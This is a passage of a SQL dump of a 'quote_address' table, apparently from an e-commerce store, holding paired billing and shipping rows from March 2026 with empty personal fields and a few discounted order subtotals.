(1204, 785, '2026-03-29 21:25:01', '2026-03-29 21:25:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1205, 786, '2026-03-29 21:25:02', '2026-03-29 21:25:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1206, 786, '2026-03-29 21:25:02', '2026-03-29 21:25:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1207, 787, '2026-03-29 21:25:03', '2026-03-29 21:25:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1208, 787, '2026-03-29 21:25:03', '2026-03-29 21:25:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1209, 788, '2026-03-29 21:25:05', '2026-03-29 21:25:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1210, 788, '2026-03-29 21:25:05', '2026-03-29 21:25:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1211, 789, '2026-03-29 21:25:06', '2026-03-29 21:25:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1212, 789, '2026-03-29 21:25:06', '2026-03-29 21:25:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1213, 790, '2026-03-29 21:25:08', '2026-03-29 21:25:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1214, 790, '2026-03-29 21:25:08', '2026-03-29 21:25:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1215, 791, '2026-03-29 21:25:09', '2026-03-29 21:25:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1216, 791, '2026-03-29 21:25:09', '2026-03-29 21:25:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1217, 792, '2026-03-29 21:25:11', '2026-03-29 21:25:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1218, 792, '2026-03-29 21:25:11', '2026-03-29 21:25:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1219, 793, '2026-03-29 21:25:12', '2026-03-29 21:25:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1220, 793, '2026-03-29 21:25:12', '2026-03-29 21:25:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1221, 794, '2026-03-29 21:25:20', '2026-03-29 21:25:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1222, 794, '2026-03-29 21:25:20', '2026-03-29 21:25:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1223, 795, '2026-03-29 21:25:26', '2026-03-29 21:25:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1224, 795, '2026-03-29 21:25:26', '2026-03-29 21:25:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1225, 796, '2026-03-29 21:25:31', '2026-03-29 21:25:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1226, 796, '2026-03-29 21:25:31', '2026-03-29 21:25:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1227, 797, '2026-03-29 21:25:36', '2026-03-29 21:25:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1228, 797, '2026-03-29 21:25:36', '2026-03-29 21:25:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1229, 798, '2026-03-29 21:25:41', '2026-03-29 21:25:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1230, 798, '2026-03-29 21:25:41', '2026-03-29 21:25:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1231, 799, '2026-03-29 23:33:15', '2026-03-29 23:33:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1232, 799, '2026-03-29 23:33:15', '2026-03-29 23:33:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1233, 800, '2026-03-30 01:09:32', '2026-03-30 01:09:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1234, 800, '2026-03-30 01:09:32', '2026-03-30 01:09:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1235, 801, '2026-03-30 06:42:47', '2026-03-30 06:42:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1236, 801, '2026-03-30 06:42:47', '2026-03-30 06:42:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1237, 802, '2026-03-30 07:16:39', '2026-03-30 07:16:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1238, 802, '2026-03-30 07:16:39', '2026-03-30 07:16:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1239, 803, '2026-03-30 09:42:56', '2026-03-30 09:42:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1240, 803, '2026-03-30 09:42:56', '2026-03-30 09:43:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 5.0000, 2110.0000, 2110.0000, 1688.0000, 1688.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -422.0000, -422.0000, 1688.0000, 1688.0000, NULL, '[]', NULL, 0.0000, 0.0000, 2110.0000, 2110.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1241, 804, '2026-03-30 12:37:20', '2026-03-30 12:37:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1242, 804, '2026-03-30 12:37:20', '2026-03-30 12:37:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1243, 805, '2026-03-30 15:04:49', '2026-03-30 15:04:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1244, 805, '2026-03-30 15:04:49', '2026-03-30 15:04:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1245, 806, '2026-03-30 18:31:46', '2026-03-30 18:31:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1246, 806, '2026-03-30 18:31:46', '2026-03-30 18:31:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1247, 807, '2026-03-30 22:29:11', '2026-03-30 22:29:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
